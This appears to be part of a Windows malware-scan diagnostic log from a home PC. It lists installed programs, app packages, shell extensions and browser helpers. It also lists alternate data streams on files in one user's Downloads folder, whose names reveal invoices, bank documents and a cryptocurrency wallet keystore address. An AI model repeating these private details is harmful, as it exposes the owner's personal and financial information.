Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer (Whitelisted) ==========
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
